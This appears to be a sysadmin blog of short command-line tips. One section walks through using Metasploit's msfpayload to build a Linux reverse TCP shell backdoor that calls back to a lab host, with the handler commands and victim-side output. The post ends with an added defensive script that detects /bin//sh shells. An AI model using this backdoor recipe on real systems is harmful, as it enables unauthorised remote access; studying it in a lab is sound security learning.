Spell check from the command line

I was pleasantly surprised to learn about a utility which lets you spell check text files, or any string passed as standard input, directly from the command line.

Example 1

[email protected]:~$ echo "What the fuc or what the fuck" | spell
fuc

Example 2

[email protected]:~$ cat test.txt
Fuck thi shit.
[email protected]:~$ spell test.txt
thi


Installing system-config-kickstart on Ubuntu

So, system-config-kickstart fails to start after the initial install.

Error:

[email protected]:~$ system-config-kickstart
Traceback (most recent call last):
File "/usr/share/system-config-kickstart/system-config-kickstart.py", line 92, in
kickstartGui.kickstartGui(file)
File "/usr/share/system-config-kickstart/kickstartGui.py", line 131, in __init__
self.X_class = xconfig.xconfig(xml, self.kickstartData)
File "/usr/share/system-config-kickstart/xconfig.py", line 80, in __init__
self.fill_driver_list()
File "/usr/share/system-config-kickstart/xconfig.py", line 115, in fill_driver_list
raise RuntimeError, (_("Could not read video driver database"))
RuntimeError: Could not read video driver database

Fix:
Downgrade the hwdata package.

# apt-get remove hwdata
# wget ftp://mirror.ovh.net/mirrors/ftp.debian.org/debian/pool/main/h/hwdata/hw...
# dpkg -i hwdata_0.234-1_all.deb
# apt-mark hold hwdata
# apt-get install system-config-kickstart

This is a known bug in Ubuntu that is yet to be fixed...
https://bugs.launchpad.net/ubuntu/+source/system-config-kickstart/+bug/1260107
https://bugs.launchpad.net/ubuntu/+source/system-config-kickstart/+bug/1236315


Ah Shit - check_http string

After updating the themes of www.alpha01.org, www.rubysecurity.org, and www.rubyninja.org, I completely forgot to also update the header template files to once again include their respective Google Analytics tracking code. This resulted in almost three months of no stats. When I originally set up the Nagios check_http checks on my sites, I didn't set them to also search for the custom Google Analytics string, a configuration I always use at work on all HTTP checks.

This can easily be accomplished using the -s|--string option of the check_http plugin.

/usr/local/nagios/libexec/check_http -I www.rubysecurity.org -S -t 10 --string UA-12912270-3

So, the lesson learned: you should always configure your check_http Nagios service checks to also search for a custom string as part of the check!


Google Apps API OAuth2 shenanigans

So I literally was just about to start flipping tables because I wasn't able to get my Google Apps API OAuth2 API verification to work. I was getting the following error:

401. That’s an error.

Error: invalid_client

no support email

As the documentation describes, I created my application, enabled Calendar API access to it, and lastly set up my credentials. The problem was that I was generating my OAuth 2.0 client IDs without completing the app's consent screen data. As soon as I specified my email address in my app's consent screen data and regenerated a new client ID, I was able to authenticate my application. If only the Google Developer Console would've given a warning of some sort prior to generating a client ID, a lot of #!%[email protected]*# moments would've been avoided.


PF syntax check

[[email protected] /etc]# pfctl -nf /etc/pf.conf
/etc/pf.conf:4: syntax error


Restarting single network interface in FreeBSD

service netif restart em0


Logging your terminal output using script

I remember when I first discovered the tab key autocomplete in Bash and being absolutely jollied because of it. Having just found the existence of the script utility, it feels almost identical.

script gives you the capability of logging everything within your current shell session. In the past, I would always resort to manually copying the text output of my terminal window to a file. In some cases, I would have a really long command line session whose output I wanted saved, which resulted in the entire terminal window crashing when being manually copied due to the extremely large output buffer! Thankfully, with script those problems are a thing of the past.

Its usage is dead simple:

[email protected]:~$ script logmyshit.log
Script started, file is logmyshit.log
[email protected]:~$ echo "script is fucking awesome!"
script is fucking awesome!
[email protected]:~$ exit

Contents of logmyshit.log:

Script started on Wed 04 Feb 2015 10:15:32 PM PST
[email protected]:~$ echo "script is fucking awesome!"
script is fucking awesome!
[email protected]:~$ exit

Script done on Wed 04 Feb 2015 10:16:00 PM PST


System Update using Ansible

CentOS

ansible centosbox -m yum -a 'name=* state=latest'

Debian

ansible debianbox -m apt -a 'update_cache=yes name=* state=latest'


Perl - Remove all blank lines from a file

Remove all blank lines from a file using Perl:

perl -ne 'print unless /^\s+$/ ' test.txt


Msfpayload Greatness - Creating a Simple Backdoor

So it's Saturday night, I don't have a date, nor am I drunk, so let's hack!

I'm not a Metasploit ninja whatsoever, and the basic MSF knowledge I have is from playing with it via msfconsole. I've heard of msfpayload and its capabilities, but I've never gotten a chance to play around with it until now. Holy shit, msfpayload is freaking awesome! Msfpayload essentially gives you the ability to export payloads into a standalone binary executable or DLL and, even cooler, into the actual raw shellcode representation in C, C#, Perl, Ruby, JS, VBA, or Python.

To illustrate its greatness, it's dead simple to create a standalone backdoor that you can deploy onto any system.

Syntax is straightforward:

[email protected]:~# msfpayload -h

    Usage: /opt/metasploit/apps/pro/msf3/msfpayload [< options >]  < payload > [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>

OPTIONS:

    -h       Help banner
    -l       List available payloads

So let's create ourselves a simple TCP reverse shell. Communicating with the payload is practically identical to msfconsole; in this case the LHOST (listening host) parameter is required. The X parameter says that we want a binary executable, and we save the file as cool_shit.

[email protected]:~# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.56.102 X > cool_shit
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 71
Options: {"LHOST"=>"192.168.56.102"}

At this point, assuming the backdoor has been copied to the victim's system, the attacking computer can initiate the payload handler.

[email protected]:~# msfcli multi/handler payload=linux/x86/shell/reverse_tcp LHOST=192.168.56.102 E
[*] Initializing modules...
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?

payload => linux/x86/shell/reverse_tcp
LHOST => 192.168.56.102
[*] Started reverse handler on 192.168.56.102:4444
[*] Starting the payload handler...

From here the attacker waits until the backdoor is run on the victim's computer.

There are a few gotchas and quirks that I noticed. The payload handler has to be initiated on the attacker's system prior to running the backdoor; otherwise the reverse shell backdoor will crash.

[email protected]-vm:~$ ./cool_shit
Segmentation fault (core dumped)

(Detailed strace output)

execve("./cool_shit", ["./cool_shit"], [/* 20 vars */]) = 0
[ Process PID=4859 runs in 32 bit mode. ]
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.56.102")}, 102) = -1 ECONNREFUSED (Connection refused)
syscall_4294967165(0xffaa1000, 0x1000, 0x7, 0, 0x3, 0) = -1 (errno 38)
syscall_4294967043(0x3, 0xffaa15b8, 0xffff0cff, 0, 0x3, 0) = -1 (errno 38)
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x66ffaa} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)

The second quirk was that I wasn't able to properly get a native shell session, but rather was just limited to the session's commands.

Even the process itself on the victim's system gave /bin//sh instead of /bin/sh ....

root 4227 0.0 0.1 61364 3052 ? Ss 22:53 0:00 /usr/sbin/sshd -D
root 4323 0.0 0.2 109784 4280 ? Ss 22:53 0:00 \_ sshd: tony [priv]
tony 4359 0.0 0.0 109932 1948 ? S 22:53 0:00 | \_ sshd: [email protected]/1
tony 4360 0.0 0.1 26908 4024 pts/1 Ss 22:53 0:00 | \_ -bash
tony 4874 0.0 0.0 4444 652 pts/1 S+ 23:48 0:00 | \_ /bin//sh

I haven't done much research on this quirk; it may just be some mistake on my end.

Obviously, malicious backdoors are a lot more sophisticated than this; however, the fact that the Metasploit Framework lets us easily create them as a proof of concept is truly amazing.

Reference: http://www.offensive-security.com/metasploit-unleashed/Msfpayload
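
From the defender's side, the /bin//sh entry in the process listing above is worth alerting on: the doubled slash is a common artifact of shellcode that pads the path to a multiple of four bytes. The script below is an added example, not code from the original post; its function names are hypothetical and the sample listing is constructed from the ps output shown in the post. It flags such shells and raises the severity when their stdin, stdout and stderr are all sockets.

```shell
#!/bin/sh
# Added example, not from the original post: triage for shells like the
# /bin//sh entry in the ps listing above. Function names are hypothetical.

# Reads `ps -eo pid=,user=,args=` lines on stdin and prints "pid user argv0"
# for every shell whose path contains a doubled slash.
flag_double_slash_shells() {
    awk '$3 ~ /\/\// && $3 ~ /\/(ba|da|k|z|c|tc)?sh$/ { print $1, $2, $3 }'
}

# Succeeds when fds 0, 1 and 2 of a pid all point at a socket.
# $2 is the proc root (default /proc), so a saved copy can be examined.
stdio_is_socket() {
    pid=$1
    root=${2:-/proc}
    for fd in 0 1 2; do
        case "$(readlink "$root/$pid/fd/$fd" 2>/dev/null)" in
            socket:*) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# Prints one verdict line per flagged process read from stdin.
triage() {
    proc_root=${1:-/proc}
    flag_double_slash_shells | while read -r p user argv0; do
        if stdio_is_socket "$p" "$proc_root"; then
            echo "HIGH $p $user $argv0 stdio=socket"
        else
            echo "REVIEW $p $user $argv0"
        fi
    done
}

# Constructed sample modelled on the process listing in the post.
sample_ps() {
    cat <<'EOF'
 4227 root /usr/sbin/sshd -D
 4360 tony -bash
 4874 tony /bin//sh
 4901 tony /bin/sh -c sleep 60
EOF
}

# Live use: ps -eo pid=,user=,args= | triage
```

Reading another user's /proc/PID/fd entries requires root, so run the live form with sufficient privileges.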
